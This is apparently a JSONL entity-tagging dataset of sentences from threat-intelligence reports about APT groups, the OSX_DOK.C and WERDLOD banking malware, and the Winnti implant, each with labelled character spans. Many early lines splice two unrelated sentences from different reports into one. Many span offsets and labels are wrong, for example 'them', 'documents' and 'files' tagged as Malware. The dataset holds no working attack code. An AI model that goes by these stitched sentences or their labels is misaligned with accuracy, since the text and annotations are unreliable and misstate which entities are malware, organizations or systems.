{"text": "We have also observed them using virtual private network services that use IPs based in numerous countries to ensure anonymity and obfuscate criminal operations . It will ask for a password to run command as root .", "spans": [{"start": 22, "end": 26, "label": "Malware"}, {"start": 27, "end": 65, "label": "Malware"}]}
{"text": "Once downloaded and executed , it drops an intermediate payload that further downloads a Pony DLL and Vawtrak executable , which perform data theft and connect to a command and control (C2) server . The malware will begin to download other utilities .", "spans": [{"start": 89, "end": 97, "label": "Malware"}, {"start": 102, "end": 109, "label": "Malware"}, {"start": 137, "end": 147, "label": "Malware"}, {"start": 152, "end": 159, "label": "Malware"}, {"start": 240, "end": 249, "label": "System"}]}
{"text": "After the executable is executed , it downloads Pony and Vawtrak malware variants to steal data . It relies on Homebrew , an open source software package manager to install Golang and Tor .", "spans": [{"start": 48, "end": 52, "label": "Malware"}, {"start": 57, "end": 64, "label": "Malware"}, {"start": 111, "end": 119, "label": "System"}, {"start": 137, "end": 145, "label": "System"}, {"start": 173, "end": 179, "label": "System"}, {"start": 184, "end": 187, "label": "System"}]}
{"text": "Once a valid card with a malicious EMV chip is detected , RIPPER will instantiate a timer to allow a thief to control the machine . The malware will then install fake certificates in the system to perform a MitM attack without notifying the user .", "spans": [{"start": 58, "end": 64, "label": "Malware"}, {"start": 70, "end": 89, "label": "Malware"}]}
{"text": "The toolset includes reams of documentation explaining how the cyber weapons work , as well as details about their use in highly classified intelligence operations abroad . The structure of the fake App Store matches the application bundle structure and provides both English and German interfaces .", "spans": [{"start": 44, "end": 76, "label": "Malware"}, {"start": 199, "end": 208, "label": "System"}]}
{"text": "The threat actors behind the Sea Turtle campaign were successful in compromising entities by manipulating and falsifying DNS records at various levels in the domain name space . The archive in Mac OS X looks like this :", "spans": [{"start": 4, "end": 17, "label": "Organization"}, {"start": 110, "end": 124, "label": "Malware"}, {"start": 193, "end": 201, "label": "System"}]}
{"text": "In their latest leak , they have released the UNITEDRAKE NSA exploit , which is a remote access and control tool that can remotely target Windows-based systems to capture desired information and transfer it to a server . Mac OS X will run the application if it passes certificates .", "spans": [{"start": 46, "end": 68, "label": "Vulnerability"}, {"start": 163, "end": 190, "label": "Malware"}, {"start": 195, "end": 203, "label": "Malware"}, {"start": 221, "end": 229, "label": "System"}]}
{"text": "Some of the documents exploited CVE-2017-0199 to deliver the payload . In this case , the malware is signed off by a \u201c developer \u201d , which may actually be a dummy account or that of a compromised user .", "spans": [{"start": 12, "end": 21, "label": "Malware"}, {"start": 32, "end": 45, "label": "Vulnerability"}, {"start": 49, "end": 68, "label": "Malware"}]}
{"text": "The files exploit the well-known Microsoft Office vulnerability , CVE-2012-0158 , to execute malicious code in order to take control of the targeted systems . In addition , the time stamp on the CA is new , which might mean that it was obtained specifically for this attack .", "spans": [{"start": 4, "end": 9, "label": "Malware"}, {"start": 33, "end": 63, "label": "Vulnerability"}, {"start": 66, "end": 79, "label": "Vulnerability"}, {"start": 120, "end": 132, "label": "Malware"}, {"start": 195, "end": 197, "label": "Organization"}]}
{"text": "Mimikatz is a post-exploitation tool that allows attackers to extract credentials from volatile memory . The fake certificate imitates the COMODO root certificate .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 62, "end": 81, "label": "Malware"}, {"start": 139, "end": 145, "label": "Organization"}]}
{"text": "The exploit installs Silence\u2019s loader , designed to download backdoors and other malicious programs . Take note that the fake certificate does not contain a COMODO Certificate Authority seal that certifies its validity , as seen in the comparison below :", "spans": [{"start": 4, "end": 11, "label": "Vulnerability"}, {"start": 21, "end": 30, "label": "Organization"}, {"start": 52, "end": 70, "label": "Malware"}, {"start": 157, "end": 185, "label": "Organization"}]}
{"text": "It appears that the group values hardcoded into the malware is associated with the targeted organization , as several are Saudi Arabian organizations within the telecommunications and defense industries . We noticed that this malware will not work for Mozilla Firefox or Google Chrome since these two browsers have their own root certificates .", "spans": [{"start": 20, "end": 25, "label": "Organization"}, {"start": 161, "end": 179, "label": "Organization"}, {"start": 184, "end": 202, "label": "Organization"}, {"start": 252, "end": 267, "label": "System"}, {"start": 271, "end": 284, "label": "System"}, {"start": 301, "end": 309, "label": "System"}]}
{"text": "This threat group has conducted broad targeting across a variety of industries , including financial , government , energy , chemical , and telecommunications , and has largely focused its operations within the Middle East . Of all the major browsers , only Safari uses the system \u2019s certificates .", "spans": [{"start": 5, "end": 17, "label": "Organization"}, {"start": 91, "end": 100, "label": "Organization"}, {"start": 103, "end": 113, "label": "Organization"}, {"start": 116, "end": 122, "label": "Organization"}, {"start": 125, "end": 133, "label": "Organization"}, {"start": 140, "end": 158, "label": "Organization"}, {"start": 242, "end": 250, "label": "System"}, {"start": 258, "end": 264, "label": "System"}]}
{"text": "This threat group has conducted broad targeting across a variety of industries , including financial , government , energy , chemical , and telecommunications . We observed the attacker targeting both Windows and Mac OS X in the same spam mail on June 9 , 2017 .", "spans": [{"start": 5, "end": 17, "label": "Organization"}, {"start": 91, "end": 100, "label": "Organization"}, {"start": 103, "end": 113, "label": "Organization"}, {"start": 116, "end": 122, "label": "Organization"}, {"start": 125, "end": 133, "label": "Organization"}, {"start": 140, "end": 158, "label": "Organization"}, {"start": 201, "end": 208, "label": "System"}, {"start": 213, "end": 221, "label": "System"}]}
{"text": "Join us in a live webinar as we discuss this threat group whom we assess to be working on behalf of the Iranian Government , with a mission that would benefit nation-state geopolitical and economic needs . There is a file shortcut embedded in the malicious .docx file\u2014one that will download an executable file from Dropbox that executes once clicked by the user .", "spans": [{"start": 45, "end": 57, "label": "Organization"}, {"start": 104, "end": 122, "label": "Organization"}, {"start": 159, "end": 184, "label": "Organization"}, {"start": 189, "end": 197, "label": "Organization"}, {"start": 257, "end": 262, "label": "Indicator"}, {"start": 315, "end": 322, "label": "System"}]}
{"text": "The group conducts operations primarily in the Middle East , targeting financial , government , energy , chemical , telecommunications and other industries . The functionalities are similar to the malicious app provided , which includes installing tor and proxy .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 71, "end": 80, "label": "Organization"}, {"start": 83, "end": 93, "label": "Organization"}, {"start": 96, "end": 102, "label": "Organization"}, {"start": 105, "end": 113, "label": "Organization"}, {"start": 116, "end": 134, "label": "Organization"}, {"start": 197, "end": 210, "label": "Malware"}, {"start": 248, "end": 251, "label": "System"}, {"start": 256, "end": 261, "label": "System"}]}
{"text": "HELIX KITTEN is likely an Iranian-based adversary group , active since at least late 2015 , targeting organizations in the aerospace , energy , financial , government , hospitality and telecommunications business verticals . We have already notified Dropbox about the use of its service for this malware .", "spans": [{"start": 0, "end": 12, "label": "Organization"}, {"start": 50, "end": 55, "label": "Organization"}, {"start": 123, "end": 132, "label": "Organization"}, {"start": 135, "end": 141, "label": "Organization"}, {"start": 144, "end": 153, "label": "Organization"}, {"start": 156, "end": 166, "label": "Organization"}, {"start": 169, "end": 180, "label": "Organization"}, {"start": 185, "end": 212, "label": "Organization"}, {"start": 250, "end": 257, "label": "System"}]}
{"text": "The certificates Blackfly stole were also from South Korean companies , primarily in the video game and software development industry . Dropbox has already taken down the links .", "spans": [{"start": 60, "end": 69, "label": "Organization"}, {"start": 89, "end": 133, "label": "Organization"}, {"start": 136, "end": 143, "label": "System"}]}
{"text": "Suckfly 's attacks on government organizations that provide information technology services to other government branches is not limited to India . The malware will install two proxies running on local host port 5555 and 5588 .", "spans": [{"start": 22, "end": 46, "label": "Organization"}, {"start": 60, "end": 91, "label": "Organization"}, {"start": 101, "end": 111, "label": "Organization"}, {"start": 176, "end": 183, "label": "System"}]}
{"text": "In this report we continue our research of the actor 's operations with a specific focus on a selection of custom information technology ( IT ) tools and tactics the threat actor leveraged during the early stages of the targeted attack lifecycle . All of the traffic will be hijacked into the first proxy ( port 5555 ) with the victim \u2019s external IP address as parameter .", "spans": [{"start": 114, "end": 136, "label": "Organization"}, {"start": 139, "end": 141, "label": "Organization"}]}
{"text": "CTU researchers have evidence that the TG-3390 compromised U.S and UK organizations in the following verticals : manufacturing ( specifically aerospace ( including defense contractors ) , automotive , technology , energy , and pharmaceuticals ) , education , and legal , as well as organizations focused on international relations . The first ( port 5555 ) proxy first finds the IP parameter .", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 39, "end": 46, "label": "Organization"}, {"start": 113, "end": 126, "label": "Organization"}, {"start": 142, "end": 151, "label": "Organization"}, {"start": 164, "end": 183, "label": "Organization"}, {"start": 188, "end": 198, "label": "Organization"}, {"start": 201, "end": 211, "label": "Organization"}, {"start": 214, "end": 220, "label": "Organization"}, {"start": 227, "end": 242, "label": "Organization"}, {"start": 247, "end": 256, "label": "Organization"}, {"start": 263, "end": 268, "label": "Organization"}]}
{"text": "Based on analysis of the group 's SWCs , TG-3390 operations likely affect organizations in other countries and verticals . If it is not in Switzerland , the traffic will proceed as normal .", "spans": [{"start": 34, "end": 38, "label": "System"}, {"start": 41, "end": 48, "label": "Organization"}]}
{"text": "TG-3390 operates a broad and long-running campaign of SWCs and has compromised approximately 100 websites as of this publication . If it detects an IP located in Switzerland , the malware will run an obfuscated JavaScript code and find its visiting domain .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 148, "end": 150, "label": "Indicator"}, {"start": 180, "end": 192, "label": "Malware"}]}
{"text": "CTU researchers have evidence that the threat group compromised U.S and UK organizations in the following verticals : manufacturing ( specifically aerospace ( including defense contractors ) , automotive , technology , energy , and pharmaceuticals ) , education , and legal , as well as organizations focused on international relations . If the domain is in the target , the malware will perform a MitM attack and redirect the traffic to the second proxy ( port 5588 ) , which routes the traffic to the Tor network .", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 118, "end": 131, "label": "Organization"}, {"start": 147, "end": 156, "label": "Organization"}, {"start": 169, "end": 188, "label": "Organization"}, {"start": 193, "end": 203, "label": "Organization"}, {"start": 206, "end": 216, "label": "Organization"}, {"start": 219, "end": 225, "label": "Organization"}, {"start": 232, "end": 247, "label": "Organization"}, {"start": 252, "end": 261, "label": "Organization"}, {"start": 268, "end": 273, "label": "Organization"}]}
{"text": "Based on this information , CTU researchers assess that TG-3390 aims to collect defense technology and capability intelligence , other industrial intelligence , and political intelligence from governments and NGOs . The purpose of these steps is to target users in Switzerland and hijack their traffic After deobfuscating the malware , we found the target domains :", "spans": [{"start": 28, "end": 31, "label": "Organization"}, {"start": 56, "end": 63, "label": "Organization"}, {"start": 165, "end": 187, "label": "Organization"}, {"start": 193, "end": 213, "label": "Organization"}]}
{"text": "In 2016 , the threat actors conducted a strategic web compromise ( SWC ) on the website of an international industry organization that affected aerospace , academic , media , technology , government , and utilities organizations around the world . The target domain \u2019s visitors will be redirected into an e-banking login page that looks and acts normally , but is located on dark web sites .", "spans": [{"start": 67, "end": 70, "label": "System"}, {"start": 94, "end": 129, "label": "Organization"}, {"start": 144, "end": 153, "label": "Organization"}, {"start": 156, "end": 164, "label": "Organization"}, {"start": 167, "end": 172, "label": "Organization"}, {"start": 175, "end": 185, "label": "Organization"}, {"start": 188, "end": 198, "label": "Organization"}, {"start": 205, "end": 228, "label": "Organization"}]}
{"text": "In addition , BRONZE UNION activity on multiple U.S.-based defense manufacturer networks included the threat actors seeking information associated with aerospace technologies , combat processes , and naval defense systems . However , once the victim enters an account and password .", "spans": [{"start": 48, "end": 66, "label": "Organization"}, {"start": 152, "end": 174, "label": "Organization"}, {"start": 177, "end": 193, "label": "Organization"}, {"start": 200, "end": 221, "label": "Organization"}]}
{"text": "Leafminer attempts to infiltrate target networks through various means of intrusion : watering hole websites , vulnerability scans of network services on the internet , and brute-force login attempts . A window will pop out .", "spans": [{"start": 0, "end": 9, "label": "Organization"}]}
{"text": "Leafminer also utilized Process Doppelganging , a detection evasion technique first discussed at the Black Hat EU conference last year . The pop-out window is just smoke and mirrors , where nothing actually happens once the countdown timer reaches zero .", "spans": [{"start": 0, "end": 9, "label": "Organization"}]}
{"text": "On September 15 and 19 , 2017 , Proofpoint detected and blocked spearphishing emails from this group targeting a US shipbuilding company and a US university research center with military ties . We analyzed the webpage and found attackers injecting a script into the webpage .", "spans": [{"start": 32, "end": 42, "label": "Organization"}, {"start": 95, "end": 100, "label": "Organization"}, {"start": 116, "end": 136, "label": "Organization"}, {"start": 178, "end": 186, "label": "Organization"}]}
{"text": "Between August 2 and 4 , the actor sent targeted spearphishing emails containing malicious URLs linking to documents to multiple defense contractors . Once the user enters an account and password , it will initiate POST using AJAX .", "spans": [{"start": 29, "end": 34, "label": "Organization"}, {"start": 129, "end": 148, "label": "Organization"}]}
{"text": "Between August 2 and 4 , the Leviathan sent targeted spearphishing emails containing malicious URLs linking to documents to multiple defense contractors . The POST message is sent to the same site as the fake login page\u2014which an attacker can control inside the Tor network .", "spans": [{"start": 29, "end": 38, "label": "Organization"}, {"start": 133, "end": 152, "label": "Organization"}]}
{"text": "The Leviathan generally emailed Microsoft Excel documents with malicious macros to US universities with military interests , most frequently related to the Navy . We decoded the data section and found not only the account and password , but that it also fingerprinted the user \u2019s browser and system information .", "spans": [{"start": 4, "end": 13, "label": "Organization"}, {"start": 86, "end": 98, "label": "Organization"}, {"start": 104, "end": 112, "label": "Organization"}, {"start": 156, "end": 160, "label": "Organization"}]}
{"text": "Instead , the Spring Dragon group is known to have employed spearphish exploits , strategic web compromises , and watering holes attack . While Operation Emmental was able to bypass two-way authentication by tricking its victims into installing a fake app , we have not observed OSX_DOK.C doing this .", "spans": [{"start": 14, "end": 33, "label": "Organization"}, {"start": 60, "end": 79, "label": "Vulnerability"}, {"start": 247, "end": 255, "label": "System"}, {"start": 279, "end": 288, "label": "Malware"}]}
{"text": "On November 10 , 2015 , threat actors sent a spear-phishing email to an individual at the French Ministry of Foreign Affairs . However , since they can inject code into the webpage , it means they have the ability to do this as well .", "spans": [{"start": 24, "end": 37, "label": "Organization"}, {"start": 72, "end": 82, "label": "Organization"}]}
{"text": "On November 10 , 2015 , Lotus Blossom sent a spear-phishing email to an individual at the French Ministry of Foreign Affairs . We performed static analysis on the sample and found it packed by Ultimate Packer for Executables ( UPX ) , an open source executable packer that can often be abused by malware .", "spans": [{"start": 24, "end": 37, "label": "Organization"}, {"start": 72, "end": 82, "label": "Organization"}, {"start": 193, "end": 208, "label": "System"}, {"start": 213, "end": 224, "label": "System"}, {"start": 296, "end": 303, "label": "Malware"}]}
{"text": "The Magic Hound attacks did not rely on exploit code to compromise targeted systems , instead relying on Excel and Word documents containing malicious macros . We successfully unpacked the initial sample we found dropped by the UPX unpacker .", "spans": [{"start": 228, "end": 240, "label": "System"}]}
{"text": "The Magic Hound campaign used Word and Excel documents containing malicious macros as a delivery method , specifically attempting to load MagicHound.Rollover . The malware is not obfuscated so we easily found interesting strings here .", "spans": [{"start": 138, "end": 157, "label": "System"}, {"start": 164, "end": 171, "label": "Malware"}]}
{"text": "During a recent campaign , APT32 leveraged social engineering emails with Microsoft ActiveMime file attachments to deliver malicious macros . We can see that the malware relies on bash shell for most of its setup .", "spans": [{"start": 27, "end": 32, "label": "Organization"}, {"start": 74, "end": 99, "label": "Malware"}, {"start": 162, "end": 169, "label": "Malware"}]}
{"text": "APT33 often conducts spear-phishing operations using a built-in phishing module . We were not able to unpack the sample discovered after June 9 , 2017 .", "spans": [{"start": 0, "end": 5, "label": "Organization"}]}
{"text": "In a recent attack , APT33 sent spear-phishing emails to workers in the aviation industry . The UPX gave a warning message about memory buffer overflow .", "spans": [{"start": 21, "end": 26, "label": "Organization"}, {"start": 72, "end": 89, "label": "Organization"}, {"start": 96, "end": 99, "label": "System"}]}
{"text": "These emails included recruitment-themed lures and links to malicious HTML application ( HTA ) files . The malware author seemingly made unpacking the malware more difficult to slow down or even evade the antivirus engine \u2019s scanning process .", "spans": [{"start": 70, "end": 86, "label": "System"}, {"start": 89, "end": 92, "label": "Malware"}, {"start": 107, "end": 114, "label": "Malware"}]}
{"text": "APT34 often uses compromised accounts to conduct spear-phishing operations . The packer is the same but the malware tries to exploit the undiscovered bug in the UPX library that causes unpack failure .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 17, "end": 37, "label": "System"}, {"start": 161, "end": 164, "label": "System"}]}
{"text": "APT33 leverages a mix of public and non-public tools and often conducts spear-phishing operations using a built-in phishing module from \" ALFA TEaM Shell \" , a publicly available web shell . We have reported the issues to the UPX team , and they have already fixed it .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 25, "end": 52, "label": "System"}, {"start": 138, "end": 153, "label": "System"}, {"start": 160, "end": 188, "label": "System"}, {"start": 226, "end": 229, "label": "System"}]}
{"text": "The impacted versions of the UPX library are 3.94 , 3.93 , and 3.92 .", "spans": [{"start": 29, "end": 32, "label": "System"}]}
{"text": "This technique enables the malware to efficiently run while evading unpacking techniques from the AntiVirus-integrated UPX library .", "spans": []}
{"text": "As mentioned earlier , we believe that OSX_DOK.C might be the MAC OS X version of WERDLOD , an online banking malware that used the same techniques as Operation Emmental .", "spans": [{"start": 39, "end": 48, "label": "Malware"}, {"start": 62, "end": 65, "label": "System"}, {"start": 82, "end": 89, "label": "Malware"}, {"start": 110, "end": 117, "label": "Malware"}, {"start": 151, "end": 169, "label": "System"}]}
{"text": "Other research have also connected the OSX malware and Retefe ( the external term used for WERDLOD ) via similarities in their behavior .", "spans": [{"start": 39, "end": 42, "label": "System"}, {"start": 91, "end": 98, "label": "Malware"}]}
{"text": "While OSX_DOK.C is designed for MAC S-OS OS X , which is a Unix-like system , WERDLOD is designed for Windows .", "spans": [{"start": 6, "end": 15, "label": "Malware"}, {"start": 32, "end": 45, "label": "System"}, {"start": 78, "end": 85, "label": "Malware"}, {"start": 102, "end": 109, "label": "System"}]}
{"text": "But in terms of features and behaviors , these two malware are very similar .", "spans": []}
{"text": "Here is a list of their similarities .", "spans": []}
{"text": "Both malware kill all current browsers before installing fake certificates :", "spans": []}
{"text": "Both WERDLOD and OSX_DOK.C are designed to kill the browser process before installing fake certificates .", "spans": [{"start": 5, "end": 12, "label": "Malware"}, {"start": 17, "end": 26, "label": "Malware"}]}
{"text": "While WERDLOD kills processes for Internet Explorer , Firefox , and Chrome , OSX_DOK.C does the same on Safari , Firefox , and Chrome .", "spans": [{"start": 6, "end": 13, "label": "Malware"}, {"start": 34, "end": 51, "label": "System"}, {"start": 54, "end": 61, "label": "System"}, {"start": 68, "end": 74, "label": "System"}, {"start": 77, "end": 86, "label": "Malware"}, {"start": 104, "end": 110, "label": "System"}, {"start": 113, "end": 120, "label": "System"}, {"start": 127, "end": 133, "label": "System"}]}
{"text": "Both malware share the same proxy settings and script :", "spans": [{"start": 5, "end": 12, "label": "Malware"}]}
{"text": "While WERDLOD and OSX_DOK.C use different codes ( since they target different operating systems ) , they have similar proxy settings and script formats .", "spans": [{"start": 6, "end": 13, "label": "Malware"}, {"start": 18, "end": 27, "label": "Malware"}]}
{"text": "In particular , WERDLOD uses scripts running on http://127.0.0.1:5555/#{random_string}.js?ip=#{my_ip} as proxy :", "spans": [{"start": 16, "end": 23, "label": "Malware"}, {"start": 48, "end": 101, "label": "Indicator"}]}
{"text": "Comparing it to OSX_DOK.C , we can see that it uses the same script format .", "spans": [{"start": 16, "end": 25, "label": "Malware"}]}
{"text": "Both malware have similar targets .", "spans": [{"start": 5, "end": 12, "label": "Malware"}]}
{"text": "Both WERDLOD and OSX_DOK.C targeted financial institutions , with a particular focus on banks in Switzerland .", "spans": [{"start": 5, "end": 12, "label": "Malware"}, {"start": 17, "end": 26, "label": "Malware"}]}
{"text": "Further analysis of both malware revealed that their main targets are very similar , as seen in the screenshot below .", "spans": [{"start": 25, "end": 32, "label": "Malware"}]}
{"text": "While it \u2019s possible that this is a coincidence , the rest of the evidence makes it unlikely for these two malware to target the same organizations by chance .", "spans": [{"start": 107, "end": 114, "label": "Malware"}]}
{"text": "Given the connection between WERDLOD and OSX_DOK.C , it is reasonable to assume that the latter is also a part of the Operational Emmental campaign .", "spans": [{"start": 29, "end": 36, "label": "Malware"}, {"start": 41, "end": 50, "label": "Malware"}]}
{"text": "To further illustrate , here is a timeline of Operation Emmental and its potential relationship to OSX_DOK.C :", "spans": [{"start": 99, "end": 108, "label": "Malware"}]}
{"text": "Despite phishing incidents for Mac devices being rarer than their Windows counterparts , users should still be aware that attackers can target them at any moment .", "spans": [{"start": 31, "end": 34, "label": "System"}, {"start": 66, "end": 73, "label": "System"}]}
{"text": "By implementing best practices for phishing-type attacks\u2014such as refraining from downloading files unless they are absolutely certain that they come from trustworthy sources\u2014users can avoid being victimized by malware such as OSX_DOK.C that prey on users who lack awareness of phishing strategies .", "spans": [{"start": 226, "end": 235, "label": "Malware"}]}
{"text": "In addition , end users can also benefit from security solutions such as Trend Micro Home Security for Mac , which provides comprehensive security and multi-device protection against viruses , ransomware , malicious websites , and identity thieves .", "spans": [{"start": 73, "end": 98, "label": "Organization"}, {"start": 103, "end": 106, "label": "System"}, {"start": 183, "end": 190, "label": "Malware"}, {"start": 193, "end": 203, "label": "Malware"}, {"start": 206, "end": 224, "label": "Malware"}, {"start": 231, "end": 247, "label": "Malware"}]}
{"text": "It also provides secure storage of passwords and other sensitive information .", "spans": [{"start": 0, "end": 2, "label": "Organization"}]}
{"text": "Trend Micro\u2122 Mobile Security for Apple devices ( available on the App Store ) can monitor and block phishing attacks and other malicious URLs .", "spans": [{"start": 0, "end": 28, "label": "Organization"}, {"start": 33, "end": 46, "label": "System"}, {"start": 66, "end": 75, "label": "System"}, {"start": 137, "end": 141, "label": "Indicator"}]}
{"text": "For enterprises , Trend Micro \u2019s Smart Protection Suites with XGen\u2122 security , which support Mac systems , infuse high-fidelity machine learning into a blend of threat protection techniques to eliminate security gaps across any user activity and any endpoint .", "spans": [{"start": 18, "end": 56, "label": "Organization"}, {"start": 62, "end": 76, "label": "Organization"}, {"start": 93, "end": 96, "label": "System"}]}
{"text": "Detecting threat actors in recent German industrial attacks with Windows Defender ATP .", "spans": [{"start": 65, "end": 85, "label": "System"}]}
{"text": "When a Germany-based industrial conglomerate disclosed in December 2016 that it was breached early that year , the breach was revealed to be a professionally run industrial espionage attack .", "spans": [{"start": 21, "end": 44, "label": "Organization"}]}
{"text": "According to the German press , the intruders used the Winnti family of malware as their main implant , giving them persistent access to the conglomerate \u2019s network as early as February 2016 .", "spans": [{"start": 55, "end": 61, "label": "Malware"}]}
{"text": "In this blog , we look at the Winnti malware implant as used by two known activity groups BARIUM and LEAD .", "spans": [{"start": 30, "end": 36, "label": "Malware"}, {"start": 90, "end": 96, "label": "Organization"}, {"start": 101, "end": 105, "label": "Organization"}]}
{"text": "We look at how these activity groups introduce the implant to various targets and techniques used by Microsoft researchers to track the implant .", "spans": [{"start": 101, "end": 110, "label": "Organization"}]}
{"text": "To show how this breach and similar breaches can be mitigated , we look at how Windows Defender Advanced Threat Protection ( Windows Defender ATP ) flags activities associated with BARIUM , LEAD , and other known activity groups and how it provides extensive threat intelligence about these groups .", "spans": [{"start": 79, "end": 122, "label": "System"}, {"start": 125, "end": 145, "label": "System"}, {"start": 181, "end": 187, "label": "Organization"}, {"start": 190, "end": 194, "label": "Organization"}]}
{"text": "We go through the Winnti implant installation process and explore how Windows Defender ATP can capture such attacker methods and tools and provide visualized contextual information that can aid in actual attack investigation and response .", "spans": [{"start": 18, "end": 24, "label": "Malware"}, {"start": 70, "end": 90, "label": "System"}]}
{"text": "We then discuss how centralized response options , provided as enhancements to Windows Defender ATP with the Windows 10 Creators Update , can be used to quickly stop threats , including stopping command and control ( C&C ) communication and preventing existing implants from installing additional components or from moving laterally to other computers on the network .", "spans": [{"start": 20, "end": 48, "label": "System"}, {"start": 79, "end": 99, "label": "System"}, {"start": 105, "end": 135, "label": "System"}, {"start": 217, "end": 220, "label": "Indicator"}]}
{"text": "Microsoft Threat Intelligence associates Winnti with multiple activity groups\u2014collections of malware , supporting infrastructure , online personas , victimology , and other attack artifacts that the Microsoft intelligent security graph uses to categorize and attribute threat activity .", "spans": [{"start": 0, "end": 29, "label": "Organization"}, {"start": 41, "end": 47, "label": "Malware"}, {"start": 199, "end": 235, "label": "Organization"}]}
{"text": "Microsoft labels activity groups using code names derived from elements in the periodic table .", "spans": [{"start": 0, "end": 9, "label": "Organization"}]}
{"text": "In the case of this malware , the activity groups strongly associated with Winnti are BARIUM and LEAD .", "spans": [{"start": 75, "end": 81, "label": "Malware"}, {"start": 86, "end": 92, "label": "Organization"}, {"start": 97, "end": 101, "label": "Organization"}]}
{"text": "But even though they share the use of Winnti , the BARIUM and LEAD activity groups are involved in very different intrusion scenarios .", "spans": [{"start": 38, "end": 44, "label": "Malware"}, {"start": 51, "end": 57, "label": "Organization"}, {"start": 62, "end": 66, "label": "Organization"}]}
{"text": "BARIUM begins its attacks by cultivating relationships with potential victims\u2014particularly those working in Business Development or Human Resources\u2014on various social media platforms .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 159, "end": 181, "label": "System"}]}
{"text": "Once BARIUM has established rapport , they spear-phish the victim using a variety of unsophisticated malware installation vectors , including malicious shortcut ( .lnk ) files with hidden payloads , compiled HTML help ( .chm ) files , or Microsoft Office documents containing macros or exploits .", "spans": [{"start": 5, "end": 11, "label": "Organization"}, {"start": 142, "end": 160, "label": "System"}, {"start": 163, "end": 167, "label": "Indicator"}, {"start": 199, "end": 212, "label": "System"}, {"start": 220, "end": 224, "label": "Indicator"}, {"start": 238, "end": 264, "label": "System"}]}
{"text": "Initial intrusion stages feature the Win32/Barlaiy implant\u2014notable for its use of social network profiles , collaborative document editing sites , and blogs for C&C .", "spans": [{"start": 37, "end": 50, "label": "Malware"}, {"start": 82, "end": 105, "label": "System"}, {"start": 108, "end": 144, "label": "System"}, {"start": 151, "end": 156, "label": "System"}, {"start": 161, "end": 164, "label": "Indicator"}]}
{"text": "Later stages of the intrusions rely upon Winnti for persistent access .", "spans": [{"start": 41, "end": 47, "label": "Malware"}]}
{"text": "The majority of victims recorded to date have been in electronic gaming , multimedia , and Internet content industries , although occasional intrusions against technology companies have occurred .", "spans": [{"start": 160, "end": 180, "label": "Organization"}]}
{"text": "In contrast , LEAD has established a far greater reputation for industrial espionage .", "spans": [{"start": 14, "end": 18, "label": "Organization"}]}
{"text": "In the past few years , LEAD \u2019s victims have included :", "spans": [{"start": 24, "end": 28, "label": "Organization"}]}
{"text": "Multinational , multi-industry companies involved in the manufacture of textiles , chemicals , and electronics .", "spans": [{"start": 0, "end": 13, "label": "Organization"}, {"start": 16, "end": 80, "label": "Organization"}, {"start": 83, "end": 92, "label": "Organization"}, {"start": 99, "end": 110, "label": "Organization"}]}
{"text": "Pharmaceutical companies .", "spans": [{"start": 0, "end": 24, "label": "Organization"}]}
{"text": "A company in the chemical industry .", "spans": [{"start": 0, "end": 34, "label": "Organization"}]}
{"text": "University faculty specializing in aeronautical engineering and research .", "spans": []}
{"text": "A company involved in the design and manufacture of motor vehicles .", "spans": [{"start": 0, "end": 66, "label": "Organization"}]}
{"text": "A cybersecurity company focusing on protecting industrial control systems .", "spans": [{"start": 0, "end": 73, "label": "Organization"}]}
{"text": "During these intrusions , LEAD \u2019s objective was to steal sensitive data , including research materials , process documents , and project plans .", "spans": [{"start": 26, "end": 30, "label": "Organization"}]}
{"text": "LEAD also steals code-signing certificates to sign its malware in subsequent attacks .", "spans": [{"start": 0, "end": 4, "label": "Organization"}]}
{"text": "In most cases , LEAD \u2019s attacks do not feature any advanced exploit techniques .", "spans": [{"start": 16, "end": 20, "label": "Organization"}]}
{"text": "The group also does not make special effort to cultivate victims prior to an attack .", "spans": []}
{"text": "Instead , the group often simply emails a Winnti installer to potential victims , relying on basic social engineering tactics to convince recipients to run the attached malware .", "spans": [{"start": 33, "end": 39, "label": "System"}, {"start": 42, "end": 58, "label": "System"}]}
{"text": "In some other cases , LEAD gains access to a target by brute-forcing remote access login credentials , performing SQL injection , or exploiting unpatched web servers , and then they copy the Winnti installer directly to compromised machines .", "spans": [{"start": 22, "end": 26, "label": "Organization"}, {"start": 69, "end": 100, "label": "System"}, {"start": 114, "end": 127, "label": "System"}, {"start": 154, "end": 165, "label": "System"}, {"start": 191, "end": 197, "label": "Malware"}]}
{"text": "Microsoft Analytics shows that Winnti has been used in intrusions carried out throughout Asia , Europe , Oceania , the Middle East , and the United States in the last six months .", "spans": [{"start": 0, "end": 19, "label": "Organization"}, {"start": 31, "end": 37, "label": "Malware"}]}
{"text": "The most recent series of attacks observed was in December 2016 .", "spans": []}
{"text": "Although tracking threats like Winnti involves old-fashioned investigative work , Microsoft Threat Intelligence analysts take advantage of machine learning to work at scale .", "spans": [{"start": 31, "end": 37, "label": "Malware"}, {"start": 139, "end": 155, "label": "System"}]}
{"text": "When attackers used Winnti to maintain access to web servers , they hid the implant in plain sight by masquerading it as a trusted , legitimate file .", "spans": [{"start": 20, "end": 26, "label": "Malware"}]}
{"text": "This was the case in two known intrusions in 2015 , where attackers named the implant DLL \u201c ASPNET_FILTER.DLL \u201d to disguise it as the DLL for the ASP.NET ISAPI Filter .", "spans": [{"start": 86, "end": 89, "label": "System"}, {"start": 92, "end": 109, "label": "Indicator"}, {"start": 134, "end": 137, "label": "System"}, {"start": 146, "end": 153, "label": "Indicator"}]}
{"text": "Although there are obvious differences between the legitimate file and the malicious one , filtering out the malicious file would involve going through a data set with noise from millions of possible file names , software publishers , and certificates .", "spans": []}
{"text": "Microsoft researchers used a combination of anomaly detection and supervised machine learning to reduce the data set and separate meaningful , malware-related anomalies from benign data .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 44, "end": 61, "label": "System"}, {"start": 66, "end": 93, "label": "System"}]}
{"text": "Windows Defender ATP helps network security professionals deal with intrusions from activity groups like LEAD and BARIUM in several ways .", "spans": [{"start": 0, "end": 20, "label": "System"}, {"start": 105, "end": 109, "label": "Organization"}, {"start": 114, "end": 120, "label": "Organization"}]}
